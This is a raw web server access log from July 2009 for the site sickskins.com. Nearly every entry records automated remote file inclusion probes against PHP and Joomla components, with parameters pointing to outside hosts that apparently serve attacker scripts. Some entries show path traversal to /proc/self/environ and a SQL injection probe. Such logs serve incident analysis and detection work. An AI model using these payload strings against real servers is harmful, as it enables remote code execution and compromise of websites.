61.109.250.63 - - [05/Jul/2009:07:51:16 -0700] "GET /logs/access.log//components/com_dbquery/classes/DBQ/common.class.php?mosConfig_absolute_path=http://www.daftarwarisan.gov.my/img/satu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sickskins.com"
84.17.129.100 - - [05/Jul/2009:07:58:06 -0700] "GET /logs/scripts.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sickskins.com"
66.11.230.36 - - [05/Jul/2009:07:59:05 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sickskins.com"
66.11.230.36 - - [05/Jul/2009:07:59:06 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sickskins.com"
66.11.230.36 - - [05/Jul/2009:07:59:06 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sickskins.com"
82.194.87.219 - - [05/Jul/2009:07:59:50 -0700] "GET /logs///ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.animeforum.com/impex/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.sickskins.com"
66.11.230.36 - - [05/Jul/2009:08:00:24 -0700] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sickskins.com"
61.109.250.63 - - [05/Jul/2009:08:03:10 -0700] "GET /logs/access.log%20%20//components/com_dbquery/classes/DBQ/common.class.php?mosConfig_absolute_path=http://www.daftarwarisan.gov.my/img/satu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sickskins.com"
61.109.250.63 - - [05/Jul/2009:08:03:15 -0700] "GET /logs/access.log%20%20//components/com_dbquery/classes/DBQ/common.class.php?mosConfig_absolute_path=http://www.daftarwarisan.gov.my/img/satu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sickskins.com"
89.223.3.98 - - [05/Jul/2009:08:03:18 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sickskins.com"
89.223.3.98 - - [05/Jul/2009:08:03:18 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sickskins.com"
89.223.3.98 - - [05/Jul/2009:08:03:18 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sickskins.com"
61.109.250.63 - - [05/Jul/2009:08:03:19 -0700] "GET /logs/access.log%20%20//components/com_dbquery/classes/DBQ/common.class.php?mosConfig_absolute_path=http://www.daftarwarisan.gov.my/img/satu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sickskins.com"
201.232.54.48 - - [05/Jul/2009:08:06:14 -0700] "GET /includes/ktedit/toolbar.php?dirDepth=http://aciel.biz.ly/dataquw/CHID.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
201.232.54.48 - - [05/Jul/2009:08:06:14 -0700] "GET /logs/access.log/includes/ktedit/toolbar.php?dirDepth=http://aciel.biz.ly/dataquw/CHID.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
201.232.54.48 - - [05/Jul/2009:08:06:15 -0700] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://aciel.biz.ly/dataquw/CHID.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
201.232.54.48 - - [05/Jul/2009:08:06:49 -0700] "GET /logs/access.log/includes/ktedit/toolbar.php?dirDepth=http://aciel.biz.ly/dataquw/CHID.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
201.232.54.48 - - [05/Jul/2009:08:06:49 -0700] "GET /includes/ktedit/toolbar.php?dirDepth=http://aciel.biz.ly/dataquw/CHID.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
201.232.54.48 - - [05/Jul/2009:08:06:49 -0700] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://aciel.biz.ly/dataquw/CHID.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
89.223.3.98 - - [05/Jul/2009:08:08:22 -0700] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sickskins.com"
82.194.87.219 - - [05/Jul/2009:08:14:03 -0700] "GET /logs///skin/zero_vote/error.php?dir=http://www.animeforum.com/impex/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.sickskins.com"
82.194.87.219 - - [05/Jul/2009:08:16:11 -0700] "GET /logs///skin/zero_vote/error.php?dir=http://www.animeforum.com/impex/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.sickskins.com"
88.191.37.60 - - [05/Jul/2009:08:20:29 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://game24x7.com/_a?? HTTP/1.1" 200 780 "-" "Mozilla/5.0" "www.sickskins.com"
88.191.37.60 - - [05/Jul/2009:08:20:31 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 200 1088 "-" "Mozilla/5.0" "www.sickskins.com"
88.191.37.60 - - [05/Jul/2009:08:20:31 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 200 780 "-" "Mozilla/5.0" "www.sickskins.com"
88.191.37.60 - - [05/Jul/2009:08:20:31 -0700] "GET /logs/access.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://game24x7.com/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sickskins.com"
88.191.37.60 - - [05/Jul/2009:08:20:45 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 200 780 "-" "Mozilla/5.0" "www.sickskins.com"
88.191.37.60 - - [05/Jul/2009:08:20:45 -0700] "GET /logs/access.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sickskins.com"
88.191.37.60 - - [05/Jul/2009:08:20:45 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://game24x7.com/_a?? HTTP/1.1" 200 1088 "-" "Mozilla/5.0" "www.sickskins.com"
88.191.37.60 - - [05/Jul/2009:08:20:54 -0700] "GET /logs/access.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sickskins.com"
88.191.37.60 - - [05/Jul/2009:08:20:54 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 200 1088 "-" "Mozilla/5.0" "www.sickskins.com"
88.191.37.60 - - [05/Jul/2009:08:21:15 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://game24x7.com/_a?? HTTP/1.1" 200 780 "-" "Mozilla/5.0" "www.sickskins.com"
88.191.37.60 - - [05/Jul/2009:08:21:15 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://game24x7.com/_a?? HTTP/1.1" 200 1088 "-" "Mozilla/5.0" "www.sickskins.com"
88.191.37.60 - - [05/Jul/2009:08:21:26 -0700] "GET /logs/access.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://game24x7.com/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sickskins.com"
82.146.58.249 - - [05/Jul/2009:08:22:14 -0700] "GET /?sIncPath=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 200 779 "-" "libwww-perl/5.826" "www.sickskins.com"
66.232.143.238 - - [05/Jul/2009:08:25:28 -0700] "GET /?sIncPath=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.sickskins.com"
67.161.198.16 - - [05/Jul/2009:08:28:17 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "sickskins.com"
67.161.198.16 - - [05/Jul/2009:08:28:17 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "sickskins.com"
67.161.198.16 - - [05/Jul/2009:08:28:21 -0700] "GET /logs/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "sickskins.com"
67.161.198.16 - - [05/Jul/2009:08:28:22 -0700] "GET /errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "sickskins.com"
67.161.198.16 - - [05/Jul/2009:08:28:27 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "sickskins.com"
67.161.198.16 - - [05/Jul/2009:08:28:28 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "sickskins.com"
67.161.198.16 - - [05/Jul/2009:08:28:33 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "sickskins.com"
67.161.198.16 - - [05/Jul/2009:08:28:33 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "sickskins.com"
66.11.230.36 - - [05/Jul/2009:08:32:15 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sickskins.com"
66.11.230.36 - - [05/Jul/2009:08:32:15 -0700] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sickskins.com"
66.11.230.36 - - [05/Jul/2009:08:32:15 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sickskins.com"
119.245.138.143 - - [05/Jul/2009:08:33:23 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://computercabling.ca/ta//lib/ram/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sickskins.com"
119.245.138.143 - - [05/Jul/2009:08:33:23 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://computercabling.ca/ta//lib/ram/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sickskins.com"
119.245.138.143 - - [05/Jul/2009:08:33:23 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://computercabling.ca/ta//lib/ram/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sickskins.com"
204.62.55.11 - - [05/Jul/2009:08:38:29 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" "www.sickskins.com"
204.62.55.11 - - [05/Jul/2009:08:38:31 -0700] "GET /logs/access_090626.log HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" "www.sickskins.com"
61.78.62.84 - - [05/Jul/2009:08:44:39 -0700] "GET /send_reminders.php?includedir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "sickskins.com"
61.78.62.84 - - [05/Jul/2009:08:44:39 -0700] "GET /logs/access.log%20%20/send_reminders.php?includedir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "sickskins.com"
61.78.62.84 - - [05/Jul/2009:08:44:39 -0700] "GET /logs/send_reminders.php?includedir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "sickskins.com"
61.78.62.84 - - [05/Jul/2009:08:44:54 -0700] "GET /skin/zero_vote/error.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sickskins.com"
61.78.62.84 - - [05/Jul/2009:08:44:54 -0700] "GET /logs/access.log%20%20//skin/zero_vote/error.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sickskins.com"
61.78.62.84 - - [05/Jul/2009:08:44:54 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sickskins.com"
61.78.62.84 - - [05/Jul/2009:08:45:55 -0700] "GET /skin/zero_vote/error.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sickskins.com"
61.78.62.84 - - [05/Jul/2009:08:45:55 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sickskins.com"
61.78.62.84 - - [05/Jul/2009:08:45:56 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sickskins.com"
87.230.9.68 - - [05/Jul/2009:08:46:03 -0700] "GET /logs/access.log//include/print_category.php?setup[use_category]=1&dir=http://www.krob.de/bilder/Bildb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.sickskins.com"
87.230.9.68 - - [05/Jul/2009:08:46:03 -0700] "GET /include/print_category.php?setup[use_category]=1&dir=http://www.krob.de/bilder/Bildb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.sickskins.com"
87.230.9.68 - - [05/Jul/2009:08:46:03 -0700] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://www.krob.de/bilder/Bildb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.sickskins.com"
66.135.42.164 - - [05/Jul/2009:08:48:15 -0700] "GET /logs/customer_testimonials.php?testimonial_id=' HTTP/1.1" 404 275 "-" "libwww-perl/5.816" "www.sickskins.com"
66.135.42.164 - - [05/Jul/2009:08:48:15 -0700] "GET /customer_testimonials.php?testimonial_id=' HTTP/1.1" 404 275 "-" "libwww-perl/5.816" "www.sickskins.com"
66.232.143.238 - - [05/Jul/2009:08:48:43 -0700] "GET /?sIncPath=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.sickskins.com"
61.78.62.84 - - [05/Jul/2009:08:49:32 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sickskins.com"
61.78.62.84 - - [05/Jul/2009:08:49:32 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sickskins.com"
61.78.62.84 - - [05/Jul/2009:08:49:33 -0700] "GET /skin/zero_vote/error.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sickskins.com"
61.78.62.84 - - [05/Jul/2009:08:49:35 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "sickskins.com"
61.78.62.84 - - [05/Jul/2009:08:49:35 -0700] "GET /skin/zero_vote/error.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "sickskins.com"
61.78.62.84 - - [05/Jul/2009:08:49:35 -0700] "GET /logs/access.log%20%20//skin/zero_vote/error.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "sickskins.com"
61.78.62.84 - - [05/Jul/2009:08:49:46 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "sickskins.com"
61.78.62.84 - - [05/Jul/2009:08:49:46 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "sickskins.com"
61.78.62.84 - - [05/Jul/2009:08:49:47 -0700] "GET /skin/zero_vote/error.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "sickskins.com"
61.78.62.84 - - [05/Jul/2009:08:51:29 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sickskins.com"
61.78.62.84 - - [05/Jul/2009:08:51:29 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sickskins.com"
61.78.62.84 - - [05/Jul/2009:08:51:29 -0700] "GET /skin/zero_vote/error.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sickskins.com"
94.229.66.202 - - [05/Jul/2009:08:54:04 -0700] "GET /logs/admin/classes/TplLoad.php?full_path_to_public_program=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
94.229.66.202 - - [05/Jul/2009:08:54:04 -0700] "GET /logs/scripts.log/admin/classes/TplLoad.php?full_path_to_public_program=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
94.229.66.202 - - [05/Jul/2009:08:54:07 -0700] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
94.229.66.202 - - [05/Jul/2009:08:54:34 -0700] "GET /logs/access.log/admin/classes/TplLoad.php?full_path_to_public_program=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "sickskins.com"
94.229.66.202 - - [05/Jul/2009:08:54:34 -0700] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "sickskins.com"
94.229.66.202 - - [05/Jul/2009:08:54:37 -0700] "GET /logs/admin/classes/TplLoad.php?full_path_to_public_program=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "sickskins.com"
66.232.143.238 - - [05/Jul/2009:08:58:46 -0700] "GET /logs/access.log/?sIncPath=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
66.232.143.238 - - [05/Jul/2009:08:58:46 -0700] "GET /?sIncPath=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.sickskins.com"
66.232.143.238 - - [05/Jul/2009:08:58:47 -0700] "GET /logs/?sIncPath=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 200 1081 "-" "libwww-perl/5.805" "www.sickskins.com"
94.229.66.202 - - [05/Jul/2009:09:03:01 -0700] "GET /logs/access.log/index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
94.229.66.202 - - [05/Jul/2009:09:03:01 -0700] "GET /logs/index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
94.229.66.202 - - [05/Jul/2009:09:03:04 -0700] "GET /index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
88.191.37.60 - - [05/Jul/2009:09:05:03 -0700] "GET /logs/access.log////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sickskins.com"
88.191.37.60 - - [05/Jul/2009:09:08:20 -0700] "GET /logs/access.log////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sickskins.com"
88.191.37.60 - - [05/Jul/2009:09:11:40 -0700] "GET /logs/access.log////?_SERVER[DOCUMENT_ROOT]=http://game24x7.com/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sickskins.com"
88.191.37.60 - - [05/Jul/2009:09:13:57 -0700] "GET /logs/access.log////?_SERVER[DOCUMENT_ROOT]=http://game24x7.com/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sickskins.com"
82.194.87.219 - - [05/Jul/2009:09:30:39 -0700] "GET /logs///modules/vwar/admin/admin.php?vwar_root=http://www.animeforum.com/impex/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.sickskins.com"
80.248.208.177 - - [05/Jul/2009:09:37:15 -0700] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/idd.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
80.248.208.177 - - [05/Jul/2009:09:37:15 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/idd.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
80.248.208.177 - - [05/Jul/2009:09:37:15 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/idd.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
80.248.208.177 - - [05/Jul/2009:09:39:21 -0700] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/idd.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
80.248.208.177 - - [05/Jul/2009:09:39:21 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/idd.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
80.248.208.177 - - [05/Jul/2009:09:39:21 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/idd.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
80.248.208.177 - - [05/Jul/2009:09:42:14 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
84.17.129.100 - - [05/Jul/2009:09:42:17 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sickskins.com"
84.17.129.100 - - [05/Jul/2009:09:43:32 -0700] "GET /logs/access.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sickskins.com"
84.17.129.100 - - [05/Jul/2009:09:43:32 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sickskins.com"
84.17.129.100 - - [05/Jul/2009:09:43:32 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sickskins.com"
80.248.208.177 - - [05/Jul/2009:09:43:36 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sickskins.com"
80.248.208.177 - - [05/Jul/2009:09:43:36 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sickskins.com"
80.248.208.177 - - [05/Jul/2009:09:43:36 -0700] "GET /logs/access.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sickskins.com"
